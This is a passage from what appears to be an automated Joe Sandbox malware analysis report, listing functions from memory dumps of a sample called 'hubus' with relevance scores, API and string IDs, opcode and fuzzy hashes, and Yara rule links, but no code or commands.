                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D31CBB5D002589FCF10CFA9E984AEEFBB1BB49314F14942AE815B7210D738A945CF64
                                                                                                                                                                                                                                                              Function 05AE0A31 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                                                                                              • Opcode ID: b9a80096929223b0c32b59234d11fec5216dee78140f142a86d18128da893293
                                                                                                                                                                                                                                                              • Instruction ID: 74793dffc87bbd933b04d0d157246610dff01a5baf112f56d513a7483dec5a5a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9a80096929223b0c32b59234d11fec5216dee78140f142a86d18128da893293
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E631DBB5D012589FCF10CFA9D984AEEFBF1BB49310F14942AE815B7200D778A945CF64
                                                                                                                                                                                                                                                              Function 05AE0A38 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                                                                                              • Opcode ID: f07c81ffb17b35dc544d114feb91b9367f84d23a36b922ed44af4e0786352dd6
                                                                                                                                                                                                                                                              • Instruction ID: 76469dae1ef7c91c34c7fa425938059572a1f1e4f4369b787de89571196ab525
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f07c81ffb17b35dc544d114feb91b9367f84d23a36b922ed44af4e0786352dd6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1231EAB5D012589FCF10CFA9E984AEEFBF1BB49310F14942AE814B7200D778A945CFA4
                                                                                                                                                                                                                                                              Function 05AA4FB8 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (Ar
                                                                                                                                                                                                                                                              • API String ID: 0-793193261
                                                                                                                                                                                                                                                              • Opcode ID: f3371f60665a2cdab10c3ed744f7dc332d7d456184ac32def9bf3d4499bce951
                                                                                                                                                                                                                                                              • Instruction ID: 4af0a1055ac58ee03827ca2a61e92c7dc94a9ac489de97f2e56e37e0162a46ae
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3371f60665a2cdab10c3ed744f7dc332d7d456184ac32def9bf3d4499bce951
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAA182767042019FDB169F68D954F2A7BB3FF88300F1584A9E5068B7A1CB36EC52DB90
                                                                                                                                                                                                                                                              Function 05AA0007 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              • Opcode ID: 829948105c564cd8440fcd88630a182a05365e1461a4e8370fee5aa82103da6a
                                                                                                                                                                                                                                                              • Instruction ID: 8db8def6ac4ee93438fd8b18f8395d6bef1e892073e19b9bc829a35103c2d4a1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 829948105c564cd8440fcd88630a182a05365e1461a4e8370fee5aa82103da6a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBB10B35A10219DFCB05EFA4D898EADBBB2FF89300F158159E406AB365DB34EC46CB50
                                                                                                                                                                                                                                                              Function 05AC60D0 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088273661.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ab0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: DDr
                                                                                                                                                                                                                                                              • API String ID: 0-755372105
                                                                                                                                                                                                                                                              • Opcode ID: 5f90c1ceed2b3823181a5c8dc83ccaf91f6577869c32efd9bf17249ca06a3547
                                                                                                                                                                                                                                                              • Instruction ID: 80afced8f576c9d511414c3148ed4bf2064a85e9a70dd9619162886c927a7ff2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f90c1ceed2b3823181a5c8dc83ccaf91f6577869c32efd9bf17249ca06a3547
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB818E306002119FD719EF6DD954A6ABBF2EF89310F1581ADD41AAB3A1CB39AC01CB91
                                                                                                                                                                                                                                                              Function 05AAEA3B Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4|Br
                                                                                                                                                                                                                                                              • API String ID: 0-2141330505
                                                                                                                                                                                                                                                              • Opcode ID: 6c3c16a9c325aa9a80e975a2435b1e1c0aa66b4240620e62d76be54d8907ab09
                                                                                                                                                                                                                                                              • Instruction ID: 97a7a0539b2e363949291bfbcb881584066ed1fdc7fecafdb776d01b970a7b3c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c3c16a9c325aa9a80e975a2435b1e1c0aa66b4240620e62d76be54d8907ab09
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0781C875A05218CFEB64CF29E895B9AB7F2FB89301F1480E9D509A7380DB345E85CF61
                                                                                                                                                                                                                                                              Function 05A82BFA Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: TJBr
                                                                                                                                                                                                                                                              • API String ID: 0-1684173416
                                                                                                                                                                                                                                                              • Opcode ID: d09c0cc68f94e02cf62339597b9c6230ca7cd8d8827eeb59257f14953515b5f0
                                                                                                                                                                                                                                                              • Instruction ID: 0da3bb3878a0287e873e5bc558048989383a30e05390a6716ac3ea5117ea5a2e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d09c0cc68f94e02cf62339597b9c6230ca7cd8d8827eeb59257f14953515b5f0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1171DBB8E052089FDB05DFA8E484AAEBBF2FF89301F109069E415AB354DB345D46CF51
                                                                                                                                                                                                                                                              Function 05A82C08 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: TJBr
                                                                                                                                                                                                                                                              • API String ID: 0-1684173416
                                                                                                                                                                                                                                                              • Opcode ID: c2326a49183136107d23db4b9dfa468bdeb9c00f370d9a4cb2bc8a189bd3b365
                                                                                                                                                                                                                                                              • Instruction ID: a1cfdd4b5de0aea8b3a98a4da21efc0a154de0bf3b36cf51fbf5dc6522f3ebb8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2326a49183136107d23db4b9dfa468bdeb9c00f370d9a4cb2bc8a189bd3b365
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B071B9B8E052089FCB45DFA9E484AAEBBF2FF89301F109069E415AB354DB345D46CF51
                                                                                                                                                                                                                                                              Function 05AAD9B9 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: PH=r
                                                                                                                                                                                                                                                              • API String ID: 0-1076057192
                                                                                                                                                                                                                                                              • Opcode ID: 9c20e3b907695756347b058fd322106ea731e019475609211582a66f02ba6877
                                                                                                                                                                                                                                                              • Instruction ID: 75a566eb0aec3f52a2620874c7542dcc19404451c57459a1456b123448bc945b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c20e3b907695756347b058fd322106ea731e019475609211582a66f02ba6877
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6711774A05218CFDB14DFA8E888BAEBBF2FB48305F508499D48AAB754CB745D85CF11
                                                                                                                                                                                                                                                              Function 05AA3CE8 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              • Opcode ID: 6718547136b8c92d2051264de9d6a49678dd7bb2def71932f0fc3d3d108f5b63
                                                                                                                                                                                                                                                              • Instruction ID: f181d66a211e7a01d83479704b6c022dbdee522a6c30be1b2d67fd581c364b11
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6718547136b8c92d2051264de9d6a49678dd7bb2def71932f0fc3d3d108f5b63
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9411C31B106159FCB14AB68C8A8E6EB7B7BFC8600F10442EE5069B395DF749C46CB91
                                                                                                                                                                                                                                                              Function 05AA36E1 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              • Opcode ID: 84b9b25ec24d853ac506274a96dfaf7200f9b001839be69221434ff8eb1d720d
                                                                                                                                                                                                                                                              • Instruction ID: f778a6cedffc3b3c8a808b094fdb30c2c497bb46be6de53e3e6affc2ccf65be8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84b9b25ec24d853ac506274a96dfaf7200f9b001839be69221434ff8eb1d720d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE416C363406019FD709DBA8D959F2A77F6AF88710F108069E2098F3A2CF35EC42CB90
                                                                                                                                                                                                                                                              Function 05AA36F0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              • Opcode ID: 5062906082971a4f366296ae5cea8226a6bbb2448f02c249348ec9cdf3f79af6
                                                                                                                                                                                                                                                              • Instruction ID: 0605628ce65a59a29d8eaac3ef593bc86fbf2e0ccb9477fc7f5b7434ea696bcc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5062906082971a4f366296ae5cea8226a6bbb2448f02c249348ec9cdf3f79af6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0314C753006119FD709DBA8C554F2B77FAAFC8700F108069E60A8B3A1CF75EC428791
                                                                                                                                                                                                                                                              Function 05A8DF00 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: p
                                                                                                                                                                                                                                                              • API String ID: 0-2181537457
                                                                                                                                                                                                                                                              • Opcode ID: 88e261e5912202e0ba3a66806f84706e12a5c1543a8fd8914894698087721faa
                                                                                                                                                                                                                                                              • Instruction ID: 3f997db448079a4be7091969436e1c4fada127618d21a4aa628d3d6322b2e919
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88e261e5912202e0ba3a66806f84706e12a5c1543a8fd8914894698087721faa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C841F574E01208CFDB18DFB9D994AADBBB2BF89304F24852ED815AB365DB309941CF10
                                                                                                                                                                                                                                                              Function 05AA6E28 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: HAr
                                                                                                                                                                                                                                                              • API String ID: 0-666051703
                                                                                                                                                                                                                                                              • Opcode ID: 01b1022af4232e7a9be97ee592cf643d314ec2d2cb399c446a845823005cabda
                                                                                                                                                                                                                                                              • Instruction ID: ffefaec30d16f4e001d2aadd08d49331722f80dac71272dc003f800f3576ce4a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01b1022af4232e7a9be97ee592cf643d314ec2d2cb399c446a845823005cabda
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D318F36B006148FD715DB68CA94E2E7BF6FF85710B1984A9E505CB3A2DB31EC05CB91
                                                                                                                                                                                                                                                              Function 05A8F7B0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              • Opcode ID: 62f6b6d82033429cfa1038b14becab4c0330fe3e39aad6c1cd7ecdeaf5e2d682
                                                                                                                                                                                                                                                              • Instruction ID: 48b784cac2c4eb459ba8c1faa81940a0f17c2e5d56a96d51eb07ba4ee0515c62
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62f6b6d82033429cfa1038b14becab4c0330fe3e39aad6c1cd7ecdeaf5e2d682
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99215E36700215DFCF159FA4C994EAD7BB6FF88310B0540A9EA069B361DB31DC56CBA0
                                                                                                                                                                                                                                                              Function 05A8F7C0 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              • Opcode ID: 58ba928ec5c4ebe40924d8cd56cdd1987558535d3053c6ec9b184cd594cdc826
                                                                                                                                                                                                                                                              • Instruction ID: 32cecaba09084d9d938bfcd509d94b57896274447d13d6a7d28a674c2a0a0f39
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58ba928ec5c4ebe40924d8cd56cdd1987558535d3053c6ec9b184cd594cdc826
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 572171357002059FCF199FA4C994E697FB7FF88310B058069EA069B361DB32DC56CBA1
                                                                                                                                                                                                                                                              Function 05AA3CDA Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              • Opcode ID: 69e9ced0e557f836c96c43c5cb75a9c0b9c2428a51a9afd4ecde39d4f2a1bc39
                                                                                                                                                                                                                                                              • Instruction ID: f9c1dce9342dac0b1db1e2b6c852988d9ee8e5a118e3b8d525dbf09f50c2851a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69e9ced0e557f836c96c43c5cb75a9c0b9c2428a51a9afd4ecde39d4f2a1bc39
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE213031B102159BDB15AB69C868E7EB6FBBFC8600F14442EE406DB395CF749C06C795
                                                                                                                                                                                                                                                              Function 05AA6D98 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (Ar
                                                                                                                                                                                                                                                              • API String ID: 0-793193261
                                                                                                                                                                                                                                                              • Opcode ID: 18420babe22ab8042d2e60b1cec0be9b2b328d77f9d0c383fe37a39e08c86b08
                                                                                                                                                                                                                                                              • Instruction ID: 860019c8524beafc44e58a3f50ea176ce1bd0eef913782bad6e86f243833980e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18420babe22ab8042d2e60b1cec0be9b2b328d77f9d0c383fe37a39e08c86b08
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 110126337087A14FE70A62284924B7E37E75FC2181F08406AD401CB385DF688C0683E5
                                                                                                                                                                                                                                                              Function 05A87D92 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ~
                                                                                                                                                                                                                                                              • API String ID: 0-1707062198
                                                                                                                                                                                                                                                              • Opcode ID: 3829c79faac97eaef6bb7917b2c2ac10ceb38cf14a019842fae2915399413cd4
                                                                                                                                                                                                                                                              • Instruction ID: c2dde2642ba63d5459518516971f24623e11269c9c13b50a7dfaef91f5816c4b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3829c79faac97eaef6bb7917b2c2ac10ceb38cf14a019842fae2915399413cd4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CD06CB4D05228CFCB66DF64C980A9EBBB6BB09304F1041E9D54867740DB799EC1CF94
                                                                                                                                                                                                                                                              Function 05AA3F28 Relevance: .4, Instructions: 437COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 61b5755064145ec7066bc0fa2d63b444976f7b0f98366cc18b228944fa7e770f
                                                                                                                                                                                                                                                              • Instruction ID: 3a712f0f6b4daa0b6cd3c1db01aadff14bcbf0643168dd5b4cacffcdd37108c0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61b5755064145ec7066bc0fa2d63b444976f7b0f98366cc18b228944fa7e770f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32121835B002198FCB14EF64C994BADB7B2BF89300F5085A8E54AAB355DF74ED89CB50
                                                                                                                                                                                                                                                              Function 05AA3F18 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: f9712baae283f60a9758ccf4877ee0dd482e38a4f8340c793f1c8300138207ab
                                                                                                                                                                                                                                                              • Instruction ID: 9836c35f09c437942d4bd7cd021e047704a7ff9b50add42a417a6b809179925d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9712baae283f60a9758ccf4877ee0dd482e38a4f8340c793f1c8300138207ab
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4A10A35B002158FDB14DF24C998BA9BBB2BF88300F5085A8E54AAB351DF75ED85CF50
                                                                                                                                                                                                                                                              Function 05AA9450 Relevance: .2, Instructions: 235COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 156c4e9d5b412393e455b86887853172be4f338f5d5b4ca06c001e3fccbd8926
                                                                                                                                                                                                                                                              • Instruction ID: 34cad289db16915b8073b18de0c8930fc4c14ad6546204a16ee0f24e99ab1721
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 156c4e9d5b412393e455b86887853172be4f338f5d5b4ca06c001e3fccbd8926
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3481C071B043198FCB14CBA9D584A6EBBF6FFC5204B18896ED15AC7B41DB35E806CB84
                                                                                                                                                                                                                                                              Function 05AA52D8 Relevance: .2, Instructions: 226COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
